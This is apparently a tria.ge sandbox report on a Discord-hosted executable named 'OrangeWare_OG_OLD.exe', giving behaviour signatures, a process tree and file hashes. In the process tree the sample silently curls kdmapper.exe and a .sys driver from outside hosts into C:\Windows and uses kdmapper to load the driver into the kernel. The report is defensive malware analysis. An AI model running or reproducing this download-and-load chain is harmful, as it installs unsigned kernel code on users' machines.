Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-2004-x64

8

Analysis

  • max time kernel
    95s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/04/2024, 10:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1231190534861623317/1231193035535159336/OrangeWare_OG_OLD.exe?ex=663610de&is=66239bde&hm=b2e2735709c49b9c8e674bd7eada97636fa5b548eeb09fd8dfba9944218dfdc7&

Score
8/10
persistence

Malware Config

Signatures

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1231190534861623317/1231193035535159336/OrangeWare_OG_OLD.exe?ex=663610de&is=66239bde&hm=b2e2735709c49b9c8e674bd7eada97636fa5b548eeb09fd8dfba9944218dfdc7&
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc605a46f8,0x7ffc605a4708,0x7ffc605a4718
      2⤵
        PID:2920
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
        2⤵
          PID:2320
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1776
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
          2⤵
            PID:3740
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
            2⤵
              PID:1516
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
              2⤵
                PID:4492
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                2⤵
                  PID:816
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1996
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                  2⤵
                    PID:4720
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                    2⤵
                      PID:3760
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
                      2⤵
                        PID:8
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                        2⤵
                          PID:3820
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
                          2⤵
                            PID:5540
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                            2⤵
                              PID:5652
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3508 /prefetch:8
                              2⤵
                                PID:5768
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
                                2⤵
                                  PID:5776
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:8
                                  2⤵
                                    PID:5872
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
                                    2⤵
                                      PID:5996
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3388 /prefetch:8
                                      2⤵
                                        PID:6116
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3016 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5344
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
                                        2⤵
                                          PID:5884
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6260 /prefetch:8
                                          2⤵
                                            PID:940
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
                                            2⤵
                                              PID:5136
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                                              2⤵
                                                PID:6080
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3316 /prefetch:8
                                                2⤵
                                                  PID:5304
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2056,116520608661991716,940040712778709711,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6516 /prefetch:8
                                                  2⤵
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4808
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4980
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:3192
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:5456
                                                    • C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe
                                                      "C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1508
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c cls
                                                        2⤵
                                                          PID:1588
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c cls
                                                          2⤵
                                                            PID:6076
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c cls
                                                            2⤵
                                                              PID:5844
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c curl --silent https://raw.githubusercontent.com/OrangeWareKid/kdmapperr/main/kdmapper.exe --output C:\Windows\kdmapper.exe >nul 2>&1
                                                              2⤵
                                                                PID:1204
                                                                • C:\Windows\system32\curl.exe
                                                                  curl --silent https://raw.githubusercontent.com/OrangeWareKid/kdmapperr/main/kdmapper.exe --output C:\Windows\kdmapper.exe
                                                                  3⤵
                                                                  • Drops file in Windows directory
                                                                  PID:4680
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/663ems.sys --output C:\Windows\663ems.sys >nul 2>&1
                                                                2⤵
                                                                  PID:3760
                                                                  • C:\Windows\system32\curl.exe
                                                                    curl --silent https://files.catbox.moe/663ems.sys --output C:\Windows\663ems.sys
                                                                    3⤵
                                                                    • Drops file in Windows directory
                                                                    PID:2960
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                  2⤵
                                                                    PID:1652
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c cd C:\Windows\ && kdmapper.exe 663ems.sys
                                                                    2⤵
                                                                      PID:1704
                                                                      • C:\Windows\kdmapper.exe
                                                                        kdmapper.exe 663ems.sys
                                                                        3⤵
                                                                        • Sets service image path in registry
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: LoadsDriver
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:512
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                      2⤵
                                                                        PID:4200
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                        2⤵
                                                                          PID:4220
                                                                      • C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe
                                                                        "C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe"
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6032
                                                                      • C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe
                                                                        "C:\Users\Admin\Downloads\OrangeWare_OG_OLD.exe"
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:3792

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        a9519bc058003dbea34765176083739e

                                                                        SHA1

                                                                        ef49b8790219eaddbdacb7fc97d3d05433b8575c

                                                                        SHA256

                                                                        e034683bc434a09f5d0293cb786e6a3943b902614f9211d42bed47759164d38b

                                                                        SHA512

                                                                        a1b67ccf313173c560ead25671c64de65e3e2599251926e33ce8399fde682fce5cb20f36ee330fcd8bb8f7a9c00ef432da56c9b02dfd7d3f02865f390c342b53

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        cb138796dbfb37877fcae3430bb1e2a7

                                                                        SHA1

                                                                        82bb82178c07530e42eca6caf3178d66527558bc

                                                                        SHA256

                                                                        50c55ba7baeebe1fa4573118edbca59010d659ea42761148618fb3af8a1c9bdd

                                                                        SHA512

                                                                        287471cccbe33e08015d6fc35e0bcdca0ec79bebc3a58f6a340b7747b5b2257b33651574bc83ed529aef2ba94be6e68968e59d2a8ef5f733dce9df6404ad7cc5

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                        Filesize

                                                                        111B

                                                                        MD5

                                                                        807419ca9a4734feaf8d8563a003b048

                                                                        SHA1

                                                                        a723c7d60a65886ffa068711f1e900ccc85922a6

                                                                        SHA256

                                                                        aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

                                                                        SHA512

                                                                        f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                        Filesize

                                                                        186B

                                                                        MD5

                                                                        859cf9cd77c9a6bd5b0af56f08fb5128

                                                                        SHA1

                                                                        d62387a78e8a1643ba3117187479da14bce1b65c

                                                                        SHA256

                                                                        d16c0bd72e9deb73d2e3a40eb21ac668477363c33e58765884b1663324a4eb05

                                                                        SHA512

                                                                        e60f5d7000507794a20316c7110fbee3f1d9b02efdba877bec150d5d63939eff3aa9fbba758709a8094c65a083b158840563a8e8399b64e16a077d12a1cb8fed

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        427f404eb7cdbffdf39cb54d81043ace

                                                                        SHA1

                                                                        529ab9a3127b369bdbcb4103ae2bdd6303a8629a

                                                                        SHA256

                                                                        0ca77e2d5716233885dcbc75e8af7319c29931f43b7e8d2083146f861ff439a3

                                                                        SHA512

                                                                        68094110e8f960f7068b5e374b79ce8cec1fedae00d4c9126d9e3fb19c204c6faca65e2428e1437311c4145731245711c64b012096ed6aecd156a3751dd40c99

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        49c4948a474b905686370bd1f7dcbebb

                                                                        SHA1

                                                                        836cb97f8c19220369585b04e6a766e268cfa043

                                                                        SHA256

                                                                        70f1f28a46ec49df2def5b1f0f60b518710e17d2c3ebb924e7a2abb25b917b96

                                                                        SHA512

                                                                        03c3ca3c87e389db0dcc7ad8140c667635c7a1e69b9d66f3aa2583bc6d79daa3e4880fc333b2bc076690bb05777ff5c0fe14991e5119c28d34166fe5a1c3efbe

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                        Filesize

                                                                        6KB

                                                                        MD5

                                                                        f591e8ebb7e922d26cda789e2b2baac1

                                                                        SHA1

                                                                        b67c8f5b6a98c76c94ce62ca5aca5f90022979de

                                                                        SHA256

                                                                        e009e89f1dcbe932732ef88aee82080607f0a8e11cc6956522163b11d6d92923

                                                                        SHA512

                                                                        ce40b735bf3dd4bbc824495c38c17741081a2c8d429328c9042b99f676e77a8908f7c6b7fd9e89a9fad87d9271e7a77a89f1daa429db533d7f917a8d90eeeb09

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                        Filesize

                                                                        16B

                                                                        MD5

                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                        SHA1

                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                        SHA256

                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                        SHA512

                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        2e960a79951ffac54ea44cc58a6a976a

                                                                        SHA1

                                                                        031c213115fe366071c39e0aa5a97fef25035bb8

                                                                        SHA256

                                                                        ec2275815caccc22433885b231d53eb306e3fb8b47ccd5e5d58f198658e88c4d

                                                                        SHA512

                                                                        e5e343b9e0a48aae812720b4e96654834c9d7e437347068b22151038627a4ddb311ab896f25ec848d6962843d03cd49ea0e0be6a50a61e6de296a17caf7089c5

                                                                        Download Submit

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        de4296e03f4fe43b301ffc0fc7f39135

                                                                        SHA1

                                                                        46212aeb2be5c12993044ccccc43d42b4ff2b8ed

                                                                        SHA256

                                                                        823f4e56ccc42a1f379ec6ef398f6fe4d2c8dce9c6b29a1b4b815294e32a1356

                                                                        SHA512

                                                                        04f26e09fa3fbfe26384d9c5a55775d79bade1d246c797132c8a211247d6b65809e47d2945f5eb2c678f0b4ae6febcbfd24f6a3cbb8b6bf1dcda0ea88f6a2670

                                                                        Download Submit

                                                                      • C:\Users\Admin\Downloads\Unconfirmed 356826.crdownload
                                                                        Filesize

                                                                        596KB

                                                                        MD5

                                                                        74c64f5f2151885961535ce05ce31a3e

                                                                        SHA1

                                                                        1a6de825e33c0dfa5740accf6c9c584122180dff

                                                                        SHA256

                                                                        7bebcc06751a20e98ab36e5582e5c5f6dc3e03a48430ce8bef9e6cd83bd836dc

                                                                        SHA512

                                                                        9ecaa722b5432194d9f8f915c475e3bb65c8f04e8eb7ce823cf9ca597f11f2c279de4986aebac8969ef4c2e1a8ee3d680eda44c8776baf97c7d3dcc0e1f6a7b7

                                                                        Download Submit

                                                                      • C:\Windows\kdmapper.exe
                                                                        Filesize

                                                                        140KB

                                                                        MD5

                                                                        16e6f84941d4175471a4d6db98831a36

                                                                        SHA1

                                                                        5ffacfd48f8fac4c3878e8dec15b2b70df9bc375

                                                                        SHA256

                                                                        3d5afb02d8a85f2c31023c3696128aee172073d3accdb5156f44537ec804d489

                                                                        SHA512

                                                                        9c69350c97f219cd2341b005b6ad036343383b28a117e0620e08a3e12b18139a83d77ab0c53247384d9e7605bf32d428ebd809f93ffdd8e715d8e384ef747fbc

                                                                        Download Submit